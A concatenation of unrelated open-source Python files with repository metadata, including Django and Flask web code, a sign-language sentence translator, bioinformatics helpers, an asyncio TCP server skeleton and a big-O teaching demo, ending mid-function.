def _write_module_resources(self, resource_names, output):
for resource_name in resource_names:
resource_name = path.normpath(resource_name).replace('\\', '/')
output.write('Runtime.cachedResources["%s"] = "' % resource_name)
resource_content = read_file(path.join(self.application_dir, resource_name)) + resource_source_url(resource_name)
resource_content = resource_content.replace('\\', '\\\\')
resource_content = resource_content.replace('\n', '\\n')
resource_content = resource_content.replace('"', '\\"')
output.write(resource_content)
output.write('";\n')
def _concatenate_autostart_modules(self, output):
non_autostart = set()
sorted_module_names = self.descriptors.sorted_modules()
for name in sorted_module_names:
desc = self.descriptors.modules[name]
name = desc['name']
type = self.descriptors.application[name].get('type')
if type == 'autostart':
deps = set(desc.get('dependencies', []))
non_autostart_deps = deps & non_autostart
if len(non_autostart_deps):
bail_error('Non-autostart dependencies specified for the autostarted module "%s": %s' % (name, non_autostart_deps))
output.write('\n/* Module %s */\n' % name)
modular_build.concatenate_scripts(desc.get('scripts'), join(self.application_dir, name), self.output_dir, output)
else:
non_autostart.add(name)
def _concatenate_application_script(self, output):
runtime_contents = read_file(join(self.application_dir, 'Runtime.js'))
runtime_contents = re.sub('var allDescriptors = \[\];', 'var allDescriptors = %s;' % self._release_module_descriptors().replace('\\', '\\\\'), runtime_contents, 1)
output.write('/* Runtime.js */\n')
output.write(runtime_contents)
output.write('\n/* Autostart modules */\n')
self._concatenate_autostart_modules(output)
output.write('/* Application descriptor %s */\n' % self.app_file('json'))
output.write('applicationDescriptor = ')
output.write(self.descriptors.application_json())
output.write(';\n/* Core resources */\n')
self._write_module_resources(self.core_resource_names(), output)
output.write('\n/* Application loader */\n')
output.write(read_file(join(self.application_dir, self.app_file('js'))))
def _concatenate_dynamic_module(self, module_name):
module = self.descriptors.modules[module_name]
scripts = module.get('scripts')
resources = self.descriptors.module_resources(module_name)
module_dir = join(self.application_dir, module_name)
output = StringIO()
if scripts:
modular_build.concatenate_scripts(scripts, module_dir, self.output_dir, output)
if resources:
self._write_module_resources(resources, output)
output_file_path = concatenated_module_filename(module_name, self.output_dir)
write_file(output_file_path, minify_js(output.getvalue()))
output.close()
# Outputs:
# <app_name>.html as-is
# <app_name>.js as-is
# <module_name>/<all_files>
class DebugBuilder(AppBuilder):
def __init__(self, application_name, descriptors, application_dir, output_dir):
AppBuilder.__init__(self, application_name, descriptors, application_dir, output_dir)
def build_app(self):
if self.descriptors.has_html:
self._build_html()
js_name = self.app_file('js')
src_name = join(os.getcwd(), self.application_dir, js_name)
symlink_or_copy_file(src_name, join(self.output_dir, js_name), True)
for module_name in self.descriptors.modules:
module = self.descriptors.modules[module_name]
input_module_dir = join(self.application_dir, module_name)
output_module_dir = join(self.output_dir, module_name)
symlink_or_copy_dir(input_module_dir, output_module_dir)
def _build_html(self):
html_name = self.app_file('html')
symlink_or_copy_file(join(os.getcwd(), self.application_dir, html_name), join(self.output_dir, html_name), True)
def build_application(application_name, loader, application_dir, output_dir, release_mode):
descriptors = loader.load_application(application_name + '.json')
if release_mode:
builder = ReleaseBuilder(application_name, descriptors, application_dir, output_dir)
else:
builder = DebugBuilder(application_name, descriptors, application_dir, output_dir)
builder.build_app()
| [
"[email protected]"
] | |
729aafbd622a90e8bebf023ef2424d3fcf61b70c | afea9757be324c8def68955a12be11d71ce6ad35 | /willyanealves/services/migrations/0014_auto_20201209_1623.py | aa5563d97e9d3dbc154b4da10bedc96ae1265e5e | [] | no_license | bergpb/willyane-alves | c713cac3ec3a68005f3b8145985693d2477ba706 | 8b2b9922ba35bf2043f2345228f03d80dbd01098 | refs/heads/master | 2023-02-10T19:57:50.893172 | 2021-01-11T16:17:14 | 2021-01-11T16:17:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | # Generated by Django 3.1.2 on 2020-12-09 19:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('stock', '0001_initial'),
('services', '0013_remove_kititem_price'),
]
operations = [
migrations.AlterField(
model_name='kititem',
name='item',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stockitem', to='stock.stock'),
),
]
| [
"[email protected]"
] | |
aca6cfcb482c568e01a5e582aa8c9f728f17fa4b | 3075d466d4482281fbff51bd71dd4e1c11aae7ee | /src/SintacticoSemantico.py | 479ef6f0bcba71872a8f84740609e1c6f2f1c522 | [] | no_license | AndresRQ27/LESCO-Translator | 97c68f6a74826ac8bda8f2a768856f88e87733dc | 50f487fca45e9a1f7e5697224ba72ace79d65802 | refs/heads/master | 2020-03-07T03:36:28.543380 | 2018-10-20T16:24:26 | 2018-10-20T16:24:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,606 | py | # coding=utf-8
def semantico(lista):
palabras = sintactico(lista)
t = pronombre(palabras)
r = pregunta(palabras[0])
palabras[0] = palabras[0][0].upper()+palabras[0][1:]
v = posVerb(palabras)
if(palabras != ""):
if(r[0]):
palabras[0] = "¿"+palabras[0]
if(t[0]):
palabras[v] = fixVerb(t[1],palabras)
else:
palabras[1] = fixVerb("usted", palabras)
palabras[len(palabras)-1] = palabras[len(palabras)-1]+"?"
print str(palabras)
return palabras
elif(t[0]):
if(t[0]):
if(palabras[t[2]+1]!=""):
palabras[t[2]] = t[1]
palabras[v] = fixVerb(t[1], palabras)
else:
print("no hay verbo")
print str(palabras)
return palabras
else:
print str(palabras)
return palabras
def posVerb(palabras):
verb = ["ser","estar","ir","venir","tener","hacer","decir","comer", "llamar", "cumplir", ""]
n = -1
for x in range(0,len(palabras)):
for y in verb:
if(palabras[x]==y):
n = x
return n
def pronombre(palabras):
exc = ["yo", "usted", "ustedes", "nosotros", "ellos","él", "ella"]
x = False
y = ""
n = 0
for e in exc:
for w in range(len(palabras)):
if(e == palabras[w]):
if(palabras[w+1]=="nombre"):
if(e=="yo"):
e = "mi"
elif(e=="usted"):
e = "su"
else:
e = "sus"
x = True
y = e
n = w
print(y)
return [x,y,n]
def pregunta(palabra):
preg = ["donde","cual","que","como","cuando","porque"]
t = False
w = ""
for x in preg:
if(x == palabra):
t = True
w = x
print(x)
return [t,w]
def fixVerb(pron, palabras):
verb = ["ser","estar","ir","venir","tener","hacer","decir","llamar","cumplir", ""]
conjY = ["soy", "estoy", "voy","vengo","tengo", "hago", "digo","llamo","cumplo"]
conjEEU = ["es", "está", "va","viene","tiene", "hace", "dice","llama", "cumple"]
conUs = ["son", "están", "van","vienen", "tienen", "hacen", "dicen","llaman", "cumplen"]
conN = ["somos","estamos", "vamos","venimos", "tenemos", "hacemos", "decimos","llamamos", "cumplimos"]
w = ""
for x in palabras:
for y in range(0,len(verb)):
if(x == verb[y]):
if(pron == "él" or pron == "ella" or pron == "usted" or pron == "mi" or pron == "su"):
w = conjEEU[y]
elif(pron == "yo"):
w = conjY[y]
elif(pron == "ustedes" or pron == "sus"):
w = conUs[y]
else:
w = conN[y]
return w
def sintactico(palabras):
n = 0
res = []
for x in range(0,len(palabras)):
w = ""
if(palabras[x] == " "):
for y in range(n,x):
if(palabras[y]=="10" and palabras[y+1]!=" "):
s = int(10)+int(palabras[y+1])
k = str(s)
w += k
elif(palabras[y-1]=="10"):
"suma"
else:
if(palabras[y]!=w or w.isdigit()):
w += palabras[y]
n = x +1
res += [w]
w = ""
return res
| [
"[email protected]"
] | |
ce17d3e628bbb39aa428a1fe21da1b9f4d08ce1d | 9f3365f168dc94f8009f6586a58dc536b2af6921 | /controller/oss.py | 9a8cb7996f6e745ce6d81f7397212f9de6da0a71 | [] | no_license | qmaxlambda/backend | 80d9ad8999431c4357e5a20e110c250f8809552e | 6f2a8ad9daff03499699d146015dc9f15a7f5448 | refs/heads/master | 2023-01-23T05:54:41.503490 | 2020-12-11T03:57:28 | 2020-12-11T03:57:28 | 311,026,480 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | # -*- coding: utf-8 -*-
# @Time : 2020/11/8 04:59 PM
# @Author : Mason
# @Email : [email protected]
# @File : oss.py
# @Software: PyCharm
import json
import os
import oss2
from flask import request, Blueprint
from Config import config
from util.jsons import js_ret
oss_bp = Blueprint('oss',__name__)
access_key_id = os.getenv('OSS_TEST_ACCESS_KEY_ID', config.ACCESSKEY_ID)
access_key_secret = os.getenv('OSS_TEST_ACCESS_KEY_SECRET', config.ACCESSKEY_SCRECT)
bucket_name = os.getenv('OSS_TEST_BUCKET', config.BUCKET_NAME)
endpoint = os.getenv('OSS_TEST_ENDPOINT', config.ENDPOINT)
# Validate the configuration parameters
for param in (access_key_id, access_key_secret, bucket_name, endpoint):
    assert '<' not in param, 'Please set the parameter: ' + param
# Create the Bucket object
bucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)
@oss_bp.route('/update',methods=["GET", "POST"])
def update():
    # Grab the uploaded file from the request
    file = request.files.get('file')
    if file is None:
        return js_ret(0, 'No file found in the request')
    else:
        # Upload the file to Aliyun OSS
        res = bucket.put_object(file.filename, file)
        if res.status == 200:
            # Upload succeeded: build a signed URL (valid for 60s) and return it to the front end
            url = bucket.sign_url('GET', file.filename, 60)
            data = {
                "url": url
            }
            return js_ret(1, "", data)
        # Fallback (added): report an upload failure instead of returning None
        return js_ret(0, 'Upload to OSS failed')
| [
"[email protected]"
] | |
fd08376b9c08c60bb8b11cd622e7317f4e26a932 | 722b35b7617e5b715b964419eb81de1c8958c4d1 | /locacoes/apps.py | 4e2edd5bf82f1453d7cc05d7206ffe50fae2a85a | [] | no_license | gugajung/StarVideo | 83dad32e256ce4335debc9df27be9b75e9cd32ce | 44bab79c5bc3abb3d27d519bc13ece304f28672b | refs/heads/master | 2020-09-27T03:43:56.327484 | 2019-11-19T18:19:03 | 2019-11-19T18:19:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | """
Apps: App 'locacoes'
"""
from django.apps import AppConfig
class LocacoesConfig(AppConfig):
name = 'locacoes'
| [
"[email protected]"
] | |
e6215762208ab16d0230d27ae2bd2259e021ac48 | 830837f1ca1a4d090f9979f1d448017cbf88065c | /tutorial/quickstart/views.py | eede40c2e82a5d2cee4c62f62a4c009e8e4fd883 | [] | no_license | arshadansari27/django-angular | 3bd32a937cc6f0977d00fb7fe93203011aec786e | 558472df5071dc93973173ae83aefbac0eb4fdc4 | refs/heads/master | 2016-08-12T03:34:54.079002 | 2015-11-26T08:20:36 | 2015-11-26T08:20:36 | 46,878,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from tutorial.quickstart.serializers import UserSerializer, GroupSerializer
from django.shortcuts import render
class UserViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
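# Router wiring sketch (added; mirrors the DRF quickstart's urls.py):
#   from rest_framework import routers
#   router = routers.DefaultRouter()
#   router.register(r'users', UserViewSet)
#   router.register(r'groups', GroupViewSet)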
| [
"[email protected]"
] | |
c91563eee6c60960746a34671256bdc380a91e08 | af3ec207381de315f4cb6dddba727d16d42d6c57 | /dialogue-engine/test/programytest/storage/stores/nosql/mongo/store/test_sets.py | b4a1ce00829727f91194650b0127c7d2bb059299 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mcf-yuichi/cotoba-agent-oss | 02a5554fe81ce21517f33229101013b6487f5404 | ce60833915f484c4cbdc54b4b8222d64be4b6c0d | refs/heads/master | 2023-01-12T20:07:34.364188 | 2020-11-11T00:55:16 | 2020-11-11T00:55:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,711 | py | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programytest.storage.asserts.store.assert_sets import SetStoreAsserts
from programy.storage.stores.nosql.mongo.store.sets import MongoSetsStore
from programy.storage.stores.nosql.mongo.engine import MongoStorageEngine
from programy.storage.stores.nosql.mongo.config import MongoStorageConfiguration
import programytest.storage.engines as Engines
class MongoSetsStoreTests(SetStoreAsserts):
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_initialise(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assertEqual(store.storage_engine, engine)
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_set_storage(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_set_storage(store)
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_upload_from_text(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_from_text(store)
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_upload_from_text_file(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_from_text_file(store)
@unittest.skipIf(Engines.mongo is False, Engines.mongo_disabled)
def test_upload_text_files_from_directory_no_subdir(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_text_files_from_directory_no_subdir(store)
@unittest.skip("CSV not supported yet")
def test_upload_from_csv_file(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_from_csv_file(store)
@unittest.skip("CSV not supported yet")
def test_upload_csv_files_from_directory_with_subdir(self):
config = MongoStorageConfiguration()
engine = MongoStorageEngine(config)
engine.initialise()
store = MongoSetsStore(engine)
self.assert_upload_csv_files_from_directory_with_subdir(store)
| [
"[email protected]"
] | |
097abd80763e1b42f4d5a68c9500b5438fdc4a1e | 748cbfda91c8088c8feac93f0dac884a0d334e1c | /jaspar.py | 836b84189a87fefd25d408829b74dd56eea8d398 | [] | no_license | jlwetzel/zfcode | e2aca0b8661079734953cb3d1a9970e2939e1584 | 52e6fba51dbe74d5da9871cbaf28dbc24b7ccad7 | refs/heads/master | 2020-06-30T02:54:17.754259 | 2013-07-30T23:57:27 | 2013-07-30T23:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,003 | py | # Code for retrieving and manipulating the JASPAR sql_table files
# and the JASPAR PWM file.
import os
JASPAR_BUILD = '2009-Oct12-NonRedundant'
prefix = '../data/JASPAR/' + JASPAR_BUILD
protTab = prefix + '/sql_tables/MATRIX_PROTEIN.txt'
annotTab = prefix + '/sql_tables/MATRIX_ANNOTATION.txt'
speciesTab = prefix + '/sql_tables/MATRIX_SPECIES.txt'
matrixTab = prefix + '/sql_tables/MATRIX.txt'
PWMfile = prefix + '/matrix_only.txt'
def getNewBuild():
# Get the latest build of the complete JASPAR CORE set.
# First set up directory structure in ../data/JASPAR/
JASPAR_HTML_PREFIX = "http://jaspar.genereg.net//" + \
"html/DOWNLOAD/jaspar_CORE/non_redundant/all_species/"
sqlTables = ["MATRIX.txt", "MATRIX_ANNOTATION.txt", "MATRIX_DATA.txt",
"MATRIX_PROTEIN.txt", "MATRIX_SPECIES.txt"]
os.mkdir("../data/JASPAR/" + JASPAR_BUILD)
os.mkdir("../data/JASPAR/" + JASPAR_BUILD + "/sql_tables")
for tab in sqlTables:
os.system("wget -P " + prefix + "/sql_tables/ " +
JASPAR_HTML_PREFIX + "/sql_tables/" + tab)
os.system("wget -P " + prefix + " " + JASPAR_HTML_PREFIX
+ "matrix_only/matrix_only.txt")
def getIDsByAnnot(annot, currentList = None):
# Returns a list of JASPAR unique IDs that are are
# labelled by the annots. annots is tuple (key, value)
if currentList == None:
ids = set()
else:
ids = set(currentList)
annotFile = open(annotTab, 'r')
for line in annotFile:
sp_line = line.strip().split('\t')
if len(sp_line) < 3:
continue
key = sp_line[1]
val = sp_line[2]
if key == annot[0] and val == annot[1]:
ids.add(sp_line[0])
annotFile.close()
ids = list(ids)
ids = [int(i) for i in ids]
return sorted(list(ids))
def JASPARIDs2proteinIDs(JASPARids):
# Takes a sorted list of JASPAR IDs and
# returns a list of the corresponding protein IDs
protFile = open(protTab, 'r')
i = 0
proteinIDs = []
for line in protFile:
sp_line = line.strip().split()
if int(sp_line[0]) == JASPARids[i]:
proteinIDs.append(sp_line[1])
i += 1
if i == len(JASPARids):
break
protFile.close()
return proteinIDs
def getAnnotsByJASPARid(JASPARids, label):
# Finds the annotation associated with the JasparID
# and label for each ID in the ***SORTED***
# list of sorted JASPARids
annotFile = open(annotTab, 'r')
i = 0
vals = []
for line in annotFile:
if len(line) != 0:
sp_line = line.strip().split('\t')
if int(sp_line[0]) > JASPARids[i]:
print "No label: %s for JASPAR id %d" %(label, JASPARids[i])
i += 1
if i == len(JASPARids):
break
if int(sp_line[0]) == JASPARids[i] and sp_line[1] == label:
vals.append(sp_line[2])
i += 1
if i == len(JASPARids):
break
annotFile.close()
return vals
def main():
#getNewBuild()
JASPARids = getIDsByAnnot(('family', 'BetaBetaAlpha-zinc finger'))
print JASPARids
x = getAnnotsByJASPARid(JASPARids, "family")
#protIDs = JASPARIDs2proteinIDs(JASPARids)
#print(len(protIDs))
for t in x:
print t
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
2d220c223d8de7d4b6a23be7c9e63a51b4fe4af8 | 05f759e98eefcb7962f3df768fc6e77192311188 | /prepro.py | e276e2d990eb9a35f4fef940fdc81b9d31ad80dc | [
"Apache-2.0"
] | permissive | 1048693172/transformer | 17c76605beb350a7a1d6fe50a46b3fbbefb16269 | fd26fab9a4e36816223d80e8287c0b08a6d645d0 | refs/heads/master | 2020-04-15T17:44:58.943322 | 2019-01-09T15:14:40 | 2019-01-09T15:14:40 | 164,885,732 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,267 | py | # -*- coding: utf-8 -*-
#/usr/bin/python2
'''
June 2017 by kyubyong park.
[email protected].
https://www.github.com/kyubyong/transformer
'''
from __future__ import print_function
from hyperparams import Hyperparams as hp
import tensorflow as tf
import numpy as np
import codecs
import os
import regex
from collections import Counter
def make_vocab(fpath, fname):
'''Constructs vocabulary.
Args:
fpath: A string. Input file path.
fname: A string. Output file name.
Writes vocabulary line by line to `preprocessed/fname`
'''
text = codecs.open(fpath, 'r', 'utf-8').read()
#text = regex.sub("[^\s\p{Latin}']", "", text)
words = text.split()
word2cnt = Counter(words)
if not os.path.exists('preprocessed'):
os.mkdir('preprocessed')
with codecs.open('preprocessed/{}'.format(fname), 'w', 'utf-8') as fout:
fout.write("{}\t1000000000\n{}\t1000000000\n{}\t1000000000\n{}\t1000000000\n".format("<PAD>", "<UNK>", "<S>", "</S>"))
for word, cnt in word2cnt.most_common(len(word2cnt)):
fout.write(u"{}\t{}\n".format(word, cnt))
if __name__ == '__main__':
make_vocab(hp.source_train, "de.vocab.tsv")
make_vocab(hp.target_train, "en.vocab.tsv")
print("Done") | [
"[email protected]"
] | |
7f370a2f39867e89d89ab28e23fdbd1bf78c5c33 | affb8d9028f52201dc56dff947502134dcac3066 | /class-06/demo/big_O.py | a4cb31e5067e800c86925b9dfb3be4fe661ec627 | [] | no_license | maisjamil1/amman-python-401d1 | 10aa4d81c9082fbdf18badc3de060ce1d5309e1a | 25c37a5a7c023b5a24ba7a6cc303338b62548f83 | refs/heads/master | 2022-12-28T19:23:11.143932 | 2020-10-13T11:58:30 | 2020-10-13T11:58:30 | 287,927,879 | 0 | 0 | null | 2020-08-16T11:11:27 | 2020-08-16T11:11:27 | null | UTF-8 | Python | false | false | 2,410 | py | # Measure # of operations
n = 7 #1 operation
for i in range(n):
print(i) # n operations
# n+1 operations
# n = 5 > 6
# n = 100 > 101
# n = 1000000 > 1000001
# O(n+1)
# O(n)
def testing_bigoh(n):
for i in range(n):
for j in range(n):
print(i,j) # n*n (n^2)
# testing_bigoh(8)
# O(n^2)
nums1 = [2, 5, 8, 9, 43, 7]
nums2 = [-4, 43, 7, 8, 13, 45]
# One Loop
# Return a list of all items bigger than number in unsorted list
def find_nums_above(nums_list, number):
result = [] # 1 operation
for num in nums_list: # n times
if num > number:
result.append(num) # 1 operation -- 1 extra space
elif num < number:
print("Less")
else:
print("Else")
print("Done with current iteration") # 1 operation
return result # 1 operation
print(find_nums_above(nums1, 10))
# O(2*n+1+1) => O(2n+2)
# O(n)
# O(n) spaces
def find_nums_above_loop_inside(nums_list, number):
result = [] # 1 operation
for num in nums_list: # n times
if num > number:
result.append(num) # 1 operation
elif num < number:
print("Less") # 1 op
for j in range(len(nums_list)): # n times
print("Just for fun") # 1 op
else:
print("Else") # 1 op
print("Done with current iteration") # 1 operation
return result # 1 operation
# O(1 + n (1+ (1 or 1+n or 1) ) + 1)
# O(1 + n (1+ 1+n) + 1)
# O(1 + n(2+n) +1)
# O(2 + 2n^2)
# O(2n^2)
# O(n^2)
print(find_nums_above_loop_inside(nums1, 10))
def tricky_example(a):
print("Hi") # 1 op
print (3*4*6/2) # 1 op
    a.sort() # Hidden loop: O(n log n) -- Python's Timsort (a merge-sort hybrid)
print(a) # 1 op
print("The end") # 1 op
# O(4 + sort-big-oh)
# O(sort-big-oh)
a = [4,7,2,9,5,0,3]
# Binary Search
# O(log n)
# We divide the array into two halfes and we elimate one of them
sorted_list = [-1, 4, 6, 9, 23, 30, 45, 65, 76, 77, 90]
def binary_search(sorted_nums, target):
min = 0 # 1 space
max = len(sorted_nums)-1 # 1 space
    while max >= min:  # >= so the last remaining element is still checked
pivot = (max+min)//2 # 1 space
print(max, min, pivot)
if target == sorted_nums[pivot]:
return pivot
elif target < sorted_nums[pivot]:
max = pivot-1
else:
min = pivot+1
return -1
print(binary_search(sorted_list, -1))
# Space: O(3) variables -> O(1) for this iterative version
# (a recursive version would use O(3*log n) -> O(log n) stack space)
# Time: O(log n)
def fib(i):
    # base cases: fib(0) = 0, fib(1) = 1 (without these the recursion never ends)
    if i < 2:
        return i
    return fib(i-1) + fib(i-2)
# fib(4) = fib(3) + fib(2)
# We recreate i variable in every recursive call
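# Added sketch: memoizing collapses the O(2^n) call tree to O(n) time
# (with O(n) extra space for the cache).
def fib_memo(i, cache={0: 0, 1: 1}):  # mutable default used deliberately as a cache
    if i not in cache:
        cache[i] = fib_memo(i - 1) + fib_memo(i - 2)
    return cache[i]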
| [
"[email protected]"
] | |
dcd0da39888cc54780f3269f3b421d663fbe0369 | 12d0f444452d3b2218cd270756283a0463d3e796 | /sg/models/genome_evaluator.py | ebfcee9c68636525d62cd1370f29350bfbce32e0 | [] | no_license | dal3006/load_forecasting-1 | 107ffdbb4648989ba85fa8ba39ecdddb9c24ddd1 | d324a711a1a0c7ccd9587e0ecf9988a12214a1a3 | refs/heads/master | 2023-03-17T07:44:43.487863 | 2015-03-12T15:24:37 | 2015-03-12T15:24:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,873 | py | """Use this program to evaluate one genome at a time, read from standard
input."""
import sys
import ast
import traceback
import random
import matplotlib.pyplot as plt
import sg.utils.pyevolve_utils as pu
import sg.utils
import ga
import sg.data.sintef.userloads as ul
import load_prediction as lp
from load_prediction_ar import *
from load_prediction_ar24 import *
from load_prediction_arima import *
from load_prediction_dshw import *
from load_prediction_esn import *
from load_prediction_esn24 import *
try:
from load_prediction_CBR import *
from load_prediction_wavelet import *
from load_prediction_wavelet24 import *
except ImportError:
print >>sys.stderr, "Genome evaluator can't import CBR/wavelet modules, probably some of the dependencies are not installed."
options = None
def get_options():
global options
parser = lp.prediction_options()
parser = lp.ga_options(parser)
parser = lp.data_options(parser)
parser.add_option("--model", dest="model", help="The model class that the genomes instantiate", default=None)
parser.add_option("--test-set", dest="test_set", action="store_true",
help="Test the genomes on the test set, rather than on the training set", default=False)
parser.add_option("--plot", dest="plot", action="store_true",
help="Make a plot (in combination with --test-set)", default=False)
(options, args) = parser.parse_args()
lp.options = options
if options.model is None:
print >>sys.stderr, "Model argument is required."
sys.exit(1)
def read_next_genome_list():
print "Enter genome to be evaluated: "
line = sys.stdin.readline()
if line == "":
print "End of input, exiting."
sys.exit(0)
return ast.literal_eval(line)
def next_indiv():
gl = read_next_genome_list()
genome = pu.AllelesGenome()
genome.setInternalList(gl)
genome.setParams(num_trials=options.num_trials)
return genome
def gene_test_loop(model):
while sys.stdin:
ga._model = model
indiv = next_indiv()
if options.test_set:
print "Evaluating genome on test set: ", indiv[:]
sys.stdout.flush()
try:
(target, predictions) = lp.parallel_test_genome(indiv, model) if options.parallel else lp.test_genome(indiv, model)
except Exception, e:
print >>sys.stderr, "Exception raised, failed to evaluate genome."
tb = " " + traceback.format_exc(limit=50)[:-1]
print >>sys.stderr, tb.replace("\n", "\n ")
continue
error = sg.utils.concat_and_calc_error(predictions, target, model.error_func)
print "Error on test phase: {}".format(error)
if options.plot:
sg.utils.plot_target_predictions(target, predictions)
plt.show()
else:
print "Evaluating genome on training set: ", indiv[:]
sys.stdout.flush()
fitness = ga._fitness(indiv)
print "Fitness:", fitness
if fitness != 0:
print "Error:", ga._fitness_to_error(fitness)
else:
print "Error not calculated for 0 fitness."
def run():
"""."""
get_options()
prev_handler = np.seterrcall(lp.float_err_handler)
prev_err = np.seterr(all='call')
np.seterr(under='ignore')
random.seed(options.seed)
np.random.seed(options.seed)
model_creator = eval(options.model + "(options)")
model = model_creator.get_model()
lp._print_sim_context(model._dataset)
print "Number of training sequences: %d" % options.num_trials
print "Start days of training sequences:", model._dataset.train_periods_desc
gene_test_loop(model)
ul.tempfeeder_exp().close()
if __name__ == "__main__":
run()
| [
"[email protected]"
] | |
5aa4ab44e8db688f1fcc7c5792a3d330f805cc4b | e214193fdbc342ce1b84ad4f35bd6d64de7a8767 | /bsn/common/tcp_server.py | af016b7a5eaa3c469a037f78f5023f18cf39703e | [] | no_license | bsn069/py | 78f791dab87c3246a1a173263a703c63c543c8ad | 3b6c2070d38f61eb8511495d38b1cec522ad6de7 | refs/heads/master | 2020-03-10T04:30:00.282303 | 2018-10-07T15:29:45 | 2018-10-07T15:29:45 | 129,193,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,793 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
from bsn.common import file_import_tree
file_import_tree.file_begin(__name__)
import asyncio
from bsn.common.ip_port import CIPPort
from bsn.common.ip import CIP
from bsn.common.port import CPort
from bsn.common import err
import logging
import enum
from bsn.common import tcp_accept
class EState(enum.Enum):
Null = 0
ParseIPPort = 1
Listened = 2
class CTCPServer(tcp_accept.CTCPAccept):
def __init__(self, loop):
logging.info("{}".format(self))
super().__init__(loop)
self._EStateCTCPServer = EState.Null
async def _parse_ip_port(self):
logging.info("{}".format(self))
self._CIP = CIP('0.0.0.0')
self._CPort = CPort(10001)
await asyncio.sleep(1)
async def _run(self):
logging.info("{}".format(self))
await asyncio.sleep(10)
async def run(self):
logging.info("{}".format(self))
if self._EStateCTCPServer != EState.Null:
raise err.ErrState(self._EStateCTCPServer)
try:
await self._parse_ip_port()
self._EStateCTCPServer = EState.ParseIPPort
await self.start_listen()
self._EStateCTCPServer = EState.Listened
await self._run()
logging.info("{} run end".format(self))
except Exception as e:
logging.error(e)
if self._EStateCTCPServer.value > EState.Listened.value:
await self.stop_listen()
if self._EStateCTCPServer.value > EState.ParseIPPort.value:
self._CIP = None
self._CPort = None
self._EStateCTCPServer = EState.Null
@property
def estate_tcp_server(self):
return self._EStateCTCPServer
file_import_tree.file_end(__name__)
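# Usage sketch (added; assumes the bsn package's event-loop conventions shown above):
#   loop = asyncio.get_event_loop()
#   loop.run_until_complete(CTCPServer(loop).run())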
| [
"[email protected]"
] | |
6db8075e420794f1f1c675a8d8c85b56937e0f2f | 3240f07f724583313f154ca52d617447a582fa60 | /python-village/conditions-and-loops/ini4.py | 2c52ceaed225258b96b4f4581e6e097d3ae319fa | [
"MIT"
] | permissive | uabua/rosalind | 65b7bf312a1d826e6863ff84f61b43a7c7b3d8bb | 37b3b1a1ef2a245f979ce1c2f08c4d7535d38195 | refs/heads/master | 2021-08-18T22:41:28.360916 | 2021-02-20T19:21:32 | 2021-02-20T19:21:32 | 245,150,385 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 579 | py | """
ID: INI4
Title: Conditions and Loops
URL: http://rosalind.info/problems/ini4/
"""
def sum_of_odd_integers(start, end):
"""
Counts the sum of all odd integers from start through end, inclusively.
Args:
start (int): starting number in range.
end (int): ending number in range.
Returns:
int: the sum of all odd integers from start through end, inclusively.
"""
if start % 2 == 0:
start += 1
sum_of_numbers = 0
for number in range(start, end+1, 2):
sum_of_numbers += number
return sum_of_numbers
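# O(1) alternative (added sketch): the first n odd numbers sum to n**2,
# so the sum over [start, end] is a difference of two squares.
def sum_of_odd_integers_fast(start, end):
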